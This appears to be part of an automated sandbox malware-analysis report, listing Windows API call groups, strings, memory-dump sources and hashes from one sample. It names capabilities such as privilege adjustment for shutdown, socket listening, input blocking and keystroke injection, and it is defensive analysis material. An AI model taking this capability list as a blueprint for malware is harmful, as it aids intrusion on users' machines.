                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 005024F6
                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00502526
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0050253A
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502555
                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 005025F3
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00502609
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 713712311-438819550
                                                                                                                                                                              • Opcode ID: 87c3af8014eb76313b1394fe1b58b0d3c00c2e3155e563e1455d27ddcb20e22c
                                                                                                                                                                              • Instruction ID: 3176e5940e2baa78d0bb91693c141bd539502a672bb83c93fba39b0591d97afb
                                                                                                                                                                              • Opcode Fuzzy Hash: 87c3af8014eb76313b1394fe1b58b0d3c00c2e3155e563e1455d27ddcb20e22c
                                                                                                                                                                              • Instruction Fuzzy Hash: 31418D7190021AAFCF14DFA5CC99AEEBFB4FF15304F10045AE815A62D0EB359A84DFA4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                                                              • API String ID: 0-1546025612
                                                                                                                                                                              • Opcode ID: 19d2161441f279a07efe63801ad8068cd0ac511e881fc23c809ed5224750a3ae
                                                                                                                                                                              • Instruction ID: 868063e6f45a507c8fa548dfebc5855dda844606c3c661c388e026c4caff59f1
                                                                                                                                                                              • Opcode Fuzzy Hash: 19d2161441f279a07efe63801ad8068cd0ac511e881fc23c809ed5224750a3ae
                                                                                                                                                                              • Instruction Fuzzy Hash: C7927D71E0021ACBDF24DF58C8407EEBBB1BB54314F1485AAD916AB380D7789D81DF65
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004EBF0F
                                                                                                                                                                                • Part of subcall function 004EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004EBF3C
                                                                                                                                                                                • Part of subcall function 004EBEC3: GetLastError.KERNEL32 ref: 004EBF49
                                                                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 004F830C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                              • API String ID: 2234035333-194228
                                                                                                                                                                              APIs
                                                                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00509235
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509244
                                                                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00509260
                                                                                                                                                                              • listen.WSOCK32(00000000,00000005), ref: 0050926F
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00509289
                                                                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 0050929D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279440585-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID: hNV$tMV
                                                                                                                                                                              • API String ID: 4104443479-474198503
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                                • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                              • _memmove.LIBCMT ref: 00523020
                                                                                                                                                                              • _memmove.LIBCMT ref: 00523135
                                                                                                                                                                              • _memmove.LIBCMT ref: 005231DC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1300846289-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 0050ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0050ACF5
                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0050973D
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00509760
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4170576061-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004FF37A
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FF3AA
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FF3BF
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004FF3D0
                                                                                                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 004FF3FE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2387731787-0
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,005120EC,?,005122E0), ref: 00512104
• GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00512116
Strings
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetProcessId$kernel32.dll
• API String ID: 2574300362-399901964
• Opcode ID: bb915afa7f9c779fdbd309b7a1b19fe424adc786b6a3fa608db24983c0bb6b93
• Instruction ID: 0a336335eadef11a33c2a2e8f5115a329c750c75418b7e9a77d014a9526752a9
• Opcode Fuzzy Hash: bb915afa7f9c779fdbd309b7a1b19fe424adc786b6a3fa608db24983c0bb6b93
• Instruction Fuzzy Hash: 98D0A7345407129FEB209F71F80D6423EF8BB24300F004429E64AD2254D770C8C0CA60
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004F439C
• SetKeyboardState.USER32(00000080,?,00000001), ref: 004F43B8
• PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004F4425
• SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 004F4483
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: b4cd720b2cda2a19e6ced3d239d412dfc45693a964dc6a1869c0b5c883111a13
• Instruction ID: 8cc536ff4ae194f009c094bc73438e6dab20f72657fdc2bc5d81beeaa714c231
• Opcode Fuzzy Hash: b4cd720b2cda2a19e6ced3d239d412dfc45693a964dc6a1869c0b5c883111a13
• Instruction Fuzzy Hash: 6241F5B0A0025CAAEF209B65D8057FF7BB5AB95315F04015BF681A23C1CB7C8A859779
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 004F221E
Strings
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 3f4f3318245aa13e9d0030713122d56d321a2d2c9a27bef0414175310eb32f96
• Instruction ID: dd69782e583814b6020d686bf9f3b02deb6b5bf2843785173c9e0afbfe840d83
• Opcode Fuzzy Hash: 3f4f3318245aa13e9d0030713122d56d321a2d2c9a27bef0414175310eb32f96
• Instruction Fuzzy Hash: BA323675A007059FC728CF69C580A6AB7F0FF48320B11C46EE59ADB3A1D7B4E941CB48
APIs
  • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
• DefDlgProcW.USER32(?,?,?,?,?), ref: 004CAE5E
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: LongProcWindow
• String ID:
• API String ID: 3265722593-0
• Opcode ID: 5da798c2f3655d4516191221d96241736ee016fc3e895108d936225c19327aaa
• Instruction ID: 85105f0f15bc4f7bc609199ac69594c614b05064e83fe97fc201a31f5d048ce6
• Opcode Fuzzy Hash: 5da798c2f3655d4516191221d96241736ee016fc3e895108d936225c19327aaa
• Instruction Fuzzy Hash: 32A10C6810411DBADB64AA296C89FBF3D6DFF96348B14453FF402D21D1C51D8C61A3BB
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00504A1E,00000000), ref: 005055FD
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00505629
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: 24ea3d1cab102676be6eabc6930fd2e1eec7a6d9f3455a4a5166027d11c520da
• Instruction ID: a1bcb6bd33f0d54d8b91b1aa0059e3f9a7ca82bb71bc1f764538ab369229c2bd
• Opcode Fuzzy Hash: 24ea3d1cab102676be6eabc6930fd2e1eec7a6d9f3455a4a5166027d11c520da
• Instruction Fuzzy Hash: BB41C171500A09BFEB109A91DC85FBFBBBDFB80758F10442EF605A62C0FA719E419E64
APIs
• SetErrorMode.KERNEL32(00000001), ref: 004FEA95
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004FEAEF
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004FEB3C
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: 619424511f357c6408a92c4f0af778b80ee1eeb2e183a23a766702a8dd6139f4
• Instruction ID: faf0b1c6fbe5461e1a7abf7141929731f0d5012fa4a7755f5ded6eae68565b46
• Opcode Fuzzy Hash: 619424511f357c6408a92c4f0af778b80ee1eeb2e183a23a766702a8dd6139f4
• Instruction Fuzzy Hash: 7B217F35A00208EFCB00DFA6D884AEEBBB4FF48314F14809AE505A7351DB759905CB54
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F704C
                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004F708D
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F7098
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 33631002-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004FFD71
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004FFDA1
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0050C2E2,?,?,00000000,?), ref: 004FD73F
                                                                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0050C2E2,?,?,00000000,?), ref: 004FD751
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004F4B89
                                                                                                                                                                              • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 004F4B9C
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InputSendkeybd_event
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3536248340-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004EB9EC), ref: 004EB8C5
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004EB9EC), ref: 004EB8D7
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 81990902-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,004B125D,004D7A43,004B0F35,?,?,00000001), ref: 004D8E41
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004D8E4A
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • BlockInput.USER32(00000001), ref: 00507057
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BlockInput
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3456056419-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 004F7DF8
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: mouse_event
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2434400541-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004D8E1F
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(004D6AE9,005667D8,00000014), ref: 004DA937
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                              • Opcode ID: 630bcbcfec3cd3f93bb8b9c043607580e5aa51b308d499465e10d96d3e1cf12c
                                                                                                                                                                              • Instruction ID: 20740c7f761e930f9ceb432e5b1f6231eb8c56b68af69659e7c6062a416d8d85
                                                                                                                                                                              • Opcode Fuzzy Hash: 630bcbcfec3cd3f93bb8b9c043607580e5aa51b308d499465e10d96d3e1cf12c
                                                                                                                                                                              • Instruction Fuzzy Hash: 1CB012B03031028BD7084B38FC5411A79F45759101301503D7407C36A0DB308454FF00
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                              • Instruction ID: d7c450a05304a7b8df95740e122e2e54414d041f643437ea2c958e9208378171
                                                                                                                                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                              • Instruction Fuzzy Hash: 06C1D37220519349DF2D463AC43453FFAA15AB27B171A07AFD8B3CB7D0EE28C564D624
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                              • Instruction ID: ee1276db8fe123698a3947527a5b5bdabf0f3ed0a5f5c4fca6921ce264d4e3a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                              • Instruction Fuzzy Hash: E1C1A5722051934ADF2D4639C47453FBAA15AB27B131A076FD8B3CB7E4EE2CC524D624
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                              • Instruction ID: f75f94b3e2d802c6c6bc6ade5a26789d1f10ac9b0e772c049a7d2f6efbccfa53
                                                                                                                                                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                              • Instruction Fuzzy Hash: 05C1C27220919349DF2D8639843463FBBA15AB27B5B1A076FD4B3CB7C0EE28D524D624
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
